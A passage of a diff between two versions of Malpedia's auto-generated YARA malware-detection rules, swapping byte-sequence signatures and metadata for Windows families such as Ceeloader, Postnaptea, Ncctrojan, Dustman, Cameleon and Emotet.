-		7 of them and filesize < 49152
+		7 of them and filesize < 75776
 }
-rule MALPEDIA_Win_Sharpknot_Auto : FILE
+rule MALPEDIA_Win_Ceeloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e73f10d7-589d-5303-bfd9-088b7ddd5e13"
+		id = "c4d991a8-4075-5bcb-8916-cb7ba3e3bc9e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sharpknot_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ceeloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ceeloader_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "56a2b51a444e0193080b0e96d12a6b29053b987612719c6a66e8111156406cdd"
+		logic_hash = "a2c60d828b1d749bfbc654154ea7639eec54d50fcdb5e7a81ec6415d729400d3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101429,34 +101509,34 @@ rule MALPEDIA_Win_Sharpknot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 0f84b6000000 8d942454020000 8d4608 52 }
-		$sequence_1 = { 747a 8b842460040000 8d54243c 52 }
-		$sequence_2 = { c60300 f2ae f7d1 2bf9 8d542410 8bc1 8bf7 }
-		$sequence_3 = { 7419 83e818 83ea18 b906000000 8bf0 8bfa }
-		$sequence_4 = { 8bc8 8d942c2c020000 83e103 f3a4 8d8c2428010000 51 }
-		$sequence_5 = { 2bcd f7e9 c1fa02 8bc2 c1e81f 03d0 83fa01 }
-		$sequence_6 = { b801000000 5b 83c41c c3 ffd3 57 ffd3 }
-		$sequence_7 = { 8d442404 56 68???????? 50 e8???????? 8b15???????? 8d4c2410 }
-		$sequence_8 = { f3a4 b910000000 8d7c2414 f3ab 8d442454 8d4c2410 50 }
-		$sequence_9 = { c1f805 59 8a4dff 8d3c8540e64400 }
+		$sequence_0 = { 83c8ff f00fc101 83f801 751c 488b45e8 488b8888000000 488d05f5cf0800 }
+		$sequence_1 = { 89842488040000 8b84245c0c0000 0b8424600c0000 8984245c0c0000 8b8424600c0000 0b8424600c0000 898424600c0000 }
+		$sequence_2 = { 448b942444020000 4531d0 c78424b40d000000000000 488b9424d8070000 48898c2438020000 4889d1 488d1521160b00 }
+		$sequence_3 = { 44899c2454040000 448b9c2454040000 89c6 81e6b1524402 89b42450040000 8bb42450040000 c1e604 }
+		$sequence_4 = { 4181e100ffffff 44898c24fc000000 448b8c24fc000000 448b15???????? 4501c8 4539d0 48898424b0000000 }
+		$sequence_5 = { 0f8433000000 8b842418010000 898424d0000000 e8???????? 8b8c2414010000 2b8c2418010000 99 }
+		$sequence_6 = { 4c8d0d7d050e00 488b8c2410010000 4889942400010000 4c89ca 4c8b8c2400010000 898424fc000000 ff15???????? }
+		$sequence_7 = { 6689d3 66239c2476110000 66899c2474110000 6689d3 66239c2474110000 66899c2472110000 6689d3 }
+		$sequence_8 = { 4181e1f5274b02 44898c24d0050000 448b8c24d0050000 4189c2 4181e2f5274b02 44899424cc050000 448b9424cc050000 }
+		$sequence_9 = { 0315???????? 8915???????? 8b15???????? 448b05???????? 4189d2 4531c2 4431d2 }
 
 	condition:
-		7 of them and filesize < 1032192
+		7 of them and filesize < 2321408
 }
-rule MALPEDIA_Win_Tidepool_Auto : FILE
+rule MALPEDIA_Win_Postnaptea_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c47d0b4d-1c2a-583a-a083-2239d9e6be2a"
+		id = "bae1adbd-4c25-5db5-ad59-5851d74e85fc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tidepool_auto.yar#L1-L265"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.postnaptea"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.postnaptea_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "81ef950afde11d443ee135cd0277277468eb293508aa726a79916bd48024f136"
+		logic_hash = "67d33b8cfdd7ab58e5e7ea5ee0e718fa9e407a5184249ea4dfd2464e78e03ab8"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -101468,50 +101548,32 @@ rule MALPEDIA_Win_Tidepool_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5e c20400 80790800 c701???????? 740e 8b4904 }
-		$sequence_1 = { 6a00 50 8b08 ff91a4000000 }
-		$sequence_2 = { 5b 8b8d00030000 33cd e8???????? 81c504030000 }
-		$sequence_3 = { e8???????? 83c404 8bc6 5e c20400 80790800 }
-		$sequence_4 = { 64890d00000000 59 5f 5e 5b 8b8d00030000 }
-		$sequence_5 = { 83e906 51 83c006 50 6a02 }
-		$sequence_6 = { 6800000040 8d4500 50 ff15???????? }
-		$sequence_7 = { 83c40c 803d????????37 7518 68???????? }
-		$sequence_8 = { 33db 53 6a02 8bf1 e8???????? }
-		$sequence_9 = { 8d5668 52 8d5658 52 50 ff91d0000000 33ff }
-		$sequence_10 = { 75f9 b8???????? b900000400 c60000 40 49 }
-		$sequence_11 = { 8b4654 8d9698000000 52 8d5678 }
-		$sequence_12 = { 50 8b08 ff5138 47 83ff14 }
-		$sequence_13 = { 8d45ec 50 681f000200 53 }
-		$sequence_14 = { 57 50 6802020000 ff15???????? 68???????? ff15???????? 8bf8 }
-		$sequence_15 = { c60000 40 49 75f9 b8???????? b900000400 }
-		$sequence_16 = { 6810270000 ff15???????? 8b45ec 8b08 }
-		$sequence_17 = { 681f000200 56 68???????? 6801000080 }
-		$sequence_18 = { e8???????? 68???????? 68???????? 68???????? 8d4500 50 }
-		$sequence_19 = { c3 56 8bf1 e8???????? 8b4654 6a00 }
-		$sequence_20 = { 8be9 895c2418 0f8e62020000 83c0ff c1e802 }
-		$sequence_21 = { ff75ec ff15???????? 8b35???????? 6a04 }
-		$sequence_22 = { e8???????? 83c43c 8d45f8 50 683f000f00 53 ff75fc }
-		$sequence_23 = { 8d45fc 50 683f000f00 53 ff75f8 57 }
-		$sequence_24 = { b940000000 33c0 f2aa ff5614 6850010000 }
-		$sequence_25 = { ff75f4 ff75ec ffd7 56 53 }
-		$sequence_26 = { 7505 83c8ff c9 c3 8b400c 8b00 }
-		$sequence_27 = { 8d043e 50 e8???????? 037dfc 8d45d8 }
+		$sequence_0 = { c74580a1f5a2f5 c74584a3f5a4f5 c74588a5f5a6f5 c7458cd3f5f1f5 c74590f9f5eff5 c7459481f50000 4533c0 }
+		$sequence_1 = { c745841cf506f5 c7458816f519f5 c7458c13f51df5 c7459059f540f5 c745945bf50000 33f6 8bd6 }
+		$sequence_2 = { c7853002000013f51bf5 c7853402000043f520f5 c785380200000bf515f5 c7853c02000047f53bf5 c785400200001cf50cf5 c785440200000df505f5 c7854802000015f54ef5 }
+		$sequence_3 = { c7852009000003f500f5 c785240900001cf506f5 c7852809000055f515f5 c7852c09000018f51cf5 c785300900001cf55af5 c785340900005ef510f5 c7853809000008f574f5 }
+		$sequence_4 = { ff8170040000 83b97004000002 0f8493010000 83cfff 488d2dcb730300 897350 89732c }
+		$sequence_5 = { 498bd4 e8???????? c1e81f 4c8b7c2430 84c0 7430 4c897c2428 }
+		$sequence_6 = { c7856008000049f54af5 c785640800004bf54cf5 c785680800004df54ef5 c7856c0800004ff550f5 c7857008000051f552f5 c7857408000053f554f5 c7857808000055f556f5 }
+		$sequence_7 = { c745f001000000 66c745f40001 3a45dc 0f95c3 4c8d4de0 4c8d45c8 488d55b0 }
+		$sequence_8 = { c7450455f50000 4533c9 418bd1 41b8a70a0000 0f1f4000 0f1f840000000000 4863c2 }
+		$sequence_9 = { c745a401000000 c74424300af51ff5 c744243409f50af5 c744243814f51df5 c744243c1af53ff5 c74424402ff523f5 c74424442ef521f5 }
 
 	condition:
-		7 of them and filesize < 1998848
+		7 of them and filesize < 2457600
 }
-rule MALPEDIA_Win_Quickheal_Auto : FILE
+rule MALPEDIA_Win_Ncctrojan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7d4dca96-7d89-573a-86d8-cd5cf725e16a"
+		id = "73693e19-d3ac-5418-9f8a-95e68a6f57fb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quickheal"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.quickheal_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ncctrojan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ncctrojan_auto.yar#L1-L170"
 		license_url = "N/A"
-		logic_hash = "a577fc33ace43aa6e0de60cf56eae847992f0d2ae90d4e16ade87fbe86c88038"
+		logic_hash = "27c3caf8c915c86b411337145e185c50823300943eb40fbabcf07830267e1942"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101525,32 +101587,38 @@ rule MALPEDIA_Win_Quickheal_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8819 885101 83c102 3bc6 7cf0 5f }
-		$sequence_1 = { 8d94248c040000 6804010000 51 6aff 52 53 53 }
-		$sequence_2 = { 8bc3 c1e817 c1e309 0bc3 8bd8 8be8 }
-		$sequence_3 = { 8944242c 55 e9???????? ffd6 68???????? 57 8944243c }
-		$sequence_4 = { 8b4c2414 e8???????? 53 c705????????01000000 e8???????? 83c404 }
-		$sequence_5 = { e8???????? 83c418 e9???????? a0???????? 84c0 7555 a0???????? }
-		$sequence_6 = { 8d5c2410 83c404 8944240c c1eb04 8d740704 e8???????? 3206 }
-		$sequence_7 = { 6aff 68???????? 6a00 6a00 ffd3 8bf8 }
-		$sequence_8 = { 85c0 0f8491fcffff 8b4c241c 51 ff15???????? }
-		$sequence_9 = { 52 ffd7 85c0 7418 8b442410 c744241404010000 50 }
+		$sequence_0 = { 83f805 7536 8b85e8feffff 85c0 750a }
+		$sequence_1 = { 68???????? e9???????? 83f801 750a }
+		$sequence_2 = { 750a 68???????? e9???????? 83f802 }
+		$sequence_3 = { e9???????? 83f802 0f85bb000000 68???????? e9???????? 83f806 }
+		$sequence_4 = { 8d44247c 6800400000 50 e8???????? 83c40c }
+		$sequence_5 = { ff15???????? 83f8ff 0f85e0000000 ff35???????? ff15???????? }
+		$sequence_6 = { 8d442450 50 6a00 68e9fd0000 ffd7 8d842470050000 }
+		$sequence_7 = { 50 e8???????? 83c414 8d442450 50 8d44247c }
+		$sequence_8 = { 56 ff15???????? 8b8580fffeff 83781408 }
+		$sequence_9 = { 50 e8???????? 8b4d08 e8???????? e9???????? 8b4d08 e8???????? }
+		$sequence_10 = { 6804010000 8d85f0fbffff 50 56 }
+		$sequence_11 = { 8965f0 6a01 8945ec 40 6a00 }
+		$sequence_12 = { 56 57 6a00 68e9fd0000 ff15???????? 57 8bf0 }
+		$sequence_13 = { 50 e8???????? 83781408 7202 8b00 50 8d85f0fbffff }
+		$sequence_14 = { 56 57 6a00 ff750c ff15???????? 57 }
+		$sequence_15 = { 50 e8???????? 6aff 8d4601 c645fc03 50 8d8518ffffff }
 
 	condition:
-		7 of them and filesize < 553984
+		7 of them and filesize < 1160192
 }
-rule MALPEDIA_Win_Starcruft_Auto : FILE
+rule MALPEDIA_Win_Unidentified_001_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "44a05616-8be0-5d16-896e-a5310b288a10"
+		id = "2b4764d2-9d12-5e82-8bd8-6d5008485440"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.starcruft_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_001_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "8a7d60fd25a814377ba2a7789857a75b6ee211239e9e01336654dc519259df0c"
+		logic_hash = "81eac2ebab9009f83937098bc70d4667382c46b0593ed411973170676729479d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101564,32 +101632,32 @@ rule MALPEDIA_Win_Starcruft_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb6423d c1e008 0bc8 8b550c 0fb6423e c1e010 0bc8 }
-		$sequence_1 = { c785e4feffff01000000 c785e8feffff00000000 c785e0feffff00000000 a1???????? 50 ff15???????? }
-		$sequence_2 = { c68541fbffffec c68542fbffff90 c68543fbffff47 8d8d48fbffff 51 }
-		$sequence_3 = { 0bd1 8b450c 0fb64837 c1e118 0bd1 8955e4 8b550c }
-		$sequence_4 = { 8d8d30fdffff 51 ff15???????? c745f400000000 c745f000000000 8d55f0 52 }
-		$sequence_5 = { 8975e4 33c0 39b8d8d02e00 0f8491000000 }
-		$sequence_6 = { ebad 8b85e4feffff c68405f8feffff7c 8b8dbcfeffff 51 8d95c4feffff 52 }
-		$sequence_7 = { 8b4510 c70000000000 c705????????00000000 8b4d10 51 8b550c 52 }
-		$sequence_8 = { 50 e8???????? 83c418 85c0 7516 8b8d04faffff 51 }
-		$sequence_9 = { 52 8b85b4fcffff 50 e8???????? 83c414 }
+		$sequence_0 = { 741c 83e80a 0f84c6fcffff 2def000000 }
+		$sequence_1 = { 8d85d4fdffff 50 56 e8???????? 85c0 75da 32c0 }
+		$sequence_2 = { 832600 ff7508 e8???????? 85c0 7d0d 3d02400080 7406 }
+		$sequence_3 = { 56 ff5078 85c0 7d0c 68???????? 56 50 }
+		$sequence_4 = { 8b4d10 85c9 7405 e8???????? 8bc6 5e c9 }
+		$sequence_5 = { 8bec 83ec34 53 56 57 6800040000 6a00 }
+		$sequence_6 = { 57 e8???????? 8d45d4 50 6a07 57 }
+		$sequence_7 = { 0f8468feffff 3d4b475a00 0f845dfeffff 3d4d4f5a00 0f8507f9ffff 8325????????00 e9???????? }
+		$sequence_8 = { 0f85ebfcffff c705????????13000000 e9???????? c705????????06000000 e9???????? }
+		$sequence_9 = { 3bc1 7767 74d3 2d434d5200 }
 
 	condition:
-		7 of them and filesize < 294912
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Matrix_Banker_Auto : FILE
+rule MALPEDIA_Win_Dustman_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fbbbed54-1d1e-54ca-b972-776370388fdc"
+		id = "f9958a70-82e7-51bb-b66a-8dad70813bed"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.matrix_banker_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dustman_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "418333eb6355aa1c00334bbe82cc7f9927e2216ee2cd2f63bf5855e96db3a4a8"
+		logic_hash = "56d31c5fdf78a9c7870d8fbabe0b3ca7863397ea82e2f5ab171dff121b78c1f1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101603,32 +101671,32 @@ rule MALPEDIA_Win_Matrix_Banker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4a9f 80f905 7705 80c2a9 }
-		$sequence_1 = { eb16 8d489f 80f905 7704 04a9 eb0a }
-		$sequence_2 = { 8d489f 80f905 7704 04a9 eb0a 8d48bf }
-		$sequence_3 = { 04a9 eb0a 8d48bf 80f905 }
-		$sequence_4 = { e8???????? 85c0 740a e8???????? 83f8ff }
-		$sequence_5 = { eb0a 8d48bf 80f905 7702 04c9 8d4ad0 80f909 }
-		$sequence_6 = { 8d4abf 80f905 7703 80c2c9 }
-		$sequence_7 = { eb18 8d4a9f 80f905 7705 80c2a9 eb0b 8d4abf }
-		$sequence_8 = { 80f905 7704 04a9 eb0a 8d48bf }
-		$sequence_9 = { 8d4a9f 80f905 7705 80c2a9 eb0b 8d4abf }
+		$sequence_0 = { 88480a 488b4c2458 0fb60c08 88480b }
+		$sequence_1 = { eb1e 488bc3 498784f6a0c70100 4885c0 }
+		$sequence_2 = { 488b8dd8000000 0fb60c01 88483b 488b8de0000000 0fb60c01 }
+		$sequence_3 = { 4c0bd0 0fb68523020000 48c1e018 4c0bd0 0fb68524020000 48c1e020 4c0bd0 }
+		$sequence_4 = { 48898d88000000 488bca 492bca 4c8d9dd2010000 4903cb 48898d90000000 }
+		$sequence_5 = { 8bf2 4c8d0da5830000 488be9 4c8d0593830000 }
+		$sequence_6 = { 488bca 492bca 488db5a2010000 4803f1 }
+		$sequence_7 = { 488bd8 4883eb02 7826 488bfb }
+		$sequence_8 = { 884831 488b8d90000000 0fb60c01 884832 488b8d98000000 0fb60c01 884833 }
+		$sequence_9 = { 48894d78 488bca 492bca 4c8d9dd0010000 4903cb }
 
 	condition:
-		7 of them and filesize < 422912
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Hermeticwiper_Auto : FILE
+rule MALPEDIA_Win_Cameleon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8b44d155-0791-5e5b-b54e-af128b883341"
+		id = "806efc2e-ee4f-5af0-8004-774edaa0c90c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwiper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hermeticwiper_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cameleon_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "17096a8aa2a5af71cd29251b2c3f7e9bb82649586a87a38d8e44cf9b2d8d68bd"
+		logic_hash = "98c6fbda2b8586d2f1ae140ba5c66b5e26a402ce2bed7b89a93ce40a7f3c9c1d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101642,32 +101710,32 @@ rule MALPEDIA_Win_Hermeticwiper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c414 85db 7410 53 6a00 }
-		$sequence_1 = { 8bcb e8???????? 8b4c2410 83c404 8b442410 894f0c }
-		$sequence_2 = { 53 56 57 f60010 c745f8???????? c745fc???????? }
-		$sequence_3 = { 8bf2 8bc3 0facc605 8975cc c1e805 8945e4 83e107 }
-		$sequence_4 = { 85f6 0f84ee030000 56 ff35???????? }
-		$sequence_5 = { 8b4e10 8b7e08 03cf 8b560c 8b4614 13c2 89542418 }
-		$sequence_6 = { 8d8578fcffff 50 ff15???????? 8d8578fcffff 50 ff15???????? 8d8578fcffff }
-		$sequence_7 = { 897004 8b451c 895e0c c7460800000000 85c0 7506 8b4518 }
-		$sequence_8 = { 8bf7 8955f8 894dfc 03f1 }
-		$sequence_9 = { 8b542418 837b3400 7406 895340 }
+		$sequence_0 = { 8b36 33c0 6689045e 3bc7 5b 1bc0 5f }
+		$sequence_1 = { c645fc19 8d55b0 837dc408 0f4355b0 663902 }
+		$sequence_2 = { 84c0 741a 85db 7507 c746349cfb0410 57 ff7634 }
+		$sequence_3 = { 2bd9 03df 8938 8b4620 }
+		$sequence_4 = { 57 8bf1 c745fc00000000 8b7e34 }
+		$sequence_5 = { c707???????? e8???????? 0f1000 8d45b4 50 0f114708 e8???????? }
+		$sequence_6 = { 0f85c08fffff 8d0d203c0510 ba1b000000 e8???????? 5a c3 833d????????00 }
+		$sequence_7 = { 66894e02 eb41 83e00f 66c1ff04 0fb71445f0ef0410 0fbfc7 }
+		$sequence_8 = { e8???????? e9???????? 68???????? 8bcb e8???????? 85c0 0f85f7010000 }
+		$sequence_9 = { c645fc19 ba02000000 e9???????? 68???????? }
 
 	condition:
-		7 of them and filesize < 247808
+		7 of them and filesize < 824320
 }
-rule MALPEDIA_Win_Wipbot_Auto : FILE
+rule MALPEDIA_Win_Funny_Dream_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "285c0b10-9c1f-573b-962d-50c3932d3768"
+		id = "5f51b37f-d046-5620-bc19-e2253f913b87"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wipbot_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.funny_dream"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.funny_dream_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "194fd4449423e13c04280571bb64d77c07b6c4746542edc34cc7c2636335ecb2"
+		logic_hash = "cb215be87db33b154ffd783569bce8db609ba8b5cdc9d518db32c5fd6b7cb19c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101681,32 +101749,32 @@ rule MALPEDIA_Win_Wipbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48 89cf 0f847f010000 48 8d4c2430 e8???????? }
-		$sequence_1 = { c68424a10200000b c68424a20200007b 31c0 c68424a302000069 c68424a402000060 c68424a50200007a c68424a60200000e }
-		$sequence_2 = { 48 8d0d86ffffff e8???????? 4c 8d442440 895c2420 }
-		$sequence_3 = { 89c7 7504 31c0 eb72 4c 8b03 4d }
-		$sequence_4 = { 48 ffc0 3211 83f22e 48 83f804 }
-		$sequence_5 = { 89c7 750c e8???????? 0d00005e00 eb45 48 8b442438 }
-		$sequence_6 = { 48 85c0 7437 45 31c9 }
-		$sequence_7 = { 66c704430000 b801000000 eb02 31c0 48 83c428 5b }
-		$sequence_8 = { ba08000000 48 89f9 41 ffd1 eb31 }
-		$sequence_9 = { 81ce00009f00 e9???????? 8b44bdc8 e8???????? }
+		$sequence_0 = { ff15???????? 2bc6 8d9560feffff 50 }
+		$sequence_1 = { c745fc00000000 8d4f04 c74704???????? e8???????? }
+		$sequence_2 = { 8b1d???????? 7457 ffd3 3d33270000 754e }
+		$sequence_3 = { 7414 8b3d???????? 8d8d78ffffff 51 50 ffd7 85c0 }
+		$sequence_4 = { ff15???????? 85c0 0f8ee5000000 6a00 b80d000000 }
+		$sequence_5 = { 89855affffff 6689855effffff 8d8550ffffff 50 660fd68552ffffff ff15???????? }
+		$sequence_6 = { e8???????? 8b742414 83c408 85c0 748d 68???????? 50 }
+		$sequence_7 = { 03d8 8d5101 0f1f440000 8a01 41 84c0 }
+		$sequence_8 = { 8b9de8f7ffff 8b85fcfbffff 84c0 7514 80fc5a 0fb6db b901000000 }
+		$sequence_9 = { 8b85c4fdffff 89441f05 8b85b8fdffff 89441f09 8b85bcfdffff 89441f0d 83c711 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 393216
 }
-rule MALPEDIA_Win_Sysget_Auto : FILE
+rule MALPEDIA_Win_Whitebird_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6dbd418c-6815-50a8-abcf-151d7391ffca"
+		id = "e4f95047-ddcd-5a63-a3ce-8b63fa9928fc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sysget_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whitebird"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.whitebird_auto.yar#L1-L162"
 		license_url = "N/A"
-		logic_hash = "902f9069de33837221babbb397abede3730b90e4c77213918173008758853f78"
+		logic_hash = "f6f1864635810fc12da43aba0178bc81fe845d55a2fe60f4512e4d032da48db4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101720,34 +101788,39 @@ rule MALPEDIA_Win_Sysget_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f84f2000000 6a08 6a18 53 53 8d45e4 }
-		$sequence_1 = { 8bd3 59 2bd0 8a08 880c02 }
-		$sequence_2 = { 56 8975d0 8975a4 ff15???????? 8b3d???????? }
-		$sequence_3 = { ffd6 682b010000 8d85d5fdffff 53 50 }
-		$sequence_4 = { 83c702 6685c0 75f4 4b 53 8d85e4fbffff }
-		$sequence_5 = { 8b450c 8d95e4fbffff 83c40c 2bd0 0fb708 66890c02 }
-		$sequence_6 = { 59 8bc8 85d2 7407 c60100 }
-		$sequence_7 = { a5 6a30 8985f8feffff 8d850cffffff 6a00 50 }
-		$sequence_8 = { 395dfc 7508 6a7b 58 e9???????? }
-		$sequence_9 = { 53 ff75f8 ff15???????? 5f 5e 33c0 }
+		$sequence_0 = { eb09 80f92f 0f95c1 80c13f }
+		$sequence_1 = { 33c0 e9???????? 4883c9ff 33c0 488dbc2470020000 66f2af }
+		$sequence_2 = { 8bcb e8???????? 8bcb e8???????? 85c0 7426 }
+		$sequence_3 = { 458d4102 e8???????? e9???????? e8???????? cc }
+		$sequence_4 = { d1f8 83f801 0f82e7010000 33c0 884df4 }
+		$sequence_5 = { 8d45c0 50 ffb598fcffff c78594fcffff01000000 899d90fcffff ffd6 85c0 }
+		$sequence_6 = { 83fa20 75c6 41803841 7cc0 4180385a 7fba }
+		$sequence_7 = { 7e34 eb05 b9409c0000 8bc3 2bc6 3bc1 7e02 }
+		$sequence_8 = { e8???????? 488d0d4e4f0000 ff15???????? 85c0 7473 488d0d3d4d0000 }
+		$sequence_9 = { 53 53 6a0b 68???????? }
+		$sequence_10 = { 48f7d1 6689844c70020000 488d542420 488bcd ff15???????? 33c9 3bc1 }
+		$sequence_11 = { 488bd9 33c0 488d4c2432 33d2 41b8fe030000 }
+		$sequence_12 = { 8ac1 b307 f6eb 30040e }
+		$sequence_13 = { ff15???????? 48832300 4883c308 4883ef01 }
+		$sequence_14 = { 888c05e8fdffff 40 33f6 85c9 761e 8dbc05e8fdffff 81feff000000 }
 
 	condition:
-		7 of them and filesize < 352256
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Bangat_Auto : FILE
+rule MALPEDIA_Win_Emotet_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e21234e1-ab1b-5ed7-845e-28d0f46bef68"
+		id = "85da1a2d-a5c5-5b7b-9770-0decc7a1a09c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bangat_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.emotet_auto.yar#L1-L629"
 		license_url = "N/A"
-		logic_hash = "527e6766d19f3aa2fef4247d1ea1a8fda60b88b70c01d8ada16ce4d5757a0e35"
+		logic_hash = "833ebe5d59874650225701086c74088b08c5f926b449dc8bc3e0d02e1708d1c4"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -101759,32 +101832,98 @@ rule MALPEDIA_Win_Bangat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 33c0 8dbdf1fdffff ff7508 f3ab 8365fc00 66ab }
-		$sequence_1 = { 50 ff75ec e8???????? 83c40c 83f8ff 74b4 85c0 }
-		$sequence_2 = { ffd7 56 ffd7 59 59 5f 5e }
-		$sequence_3 = { 7413 3c5f 7405 345e aa ebf2 }
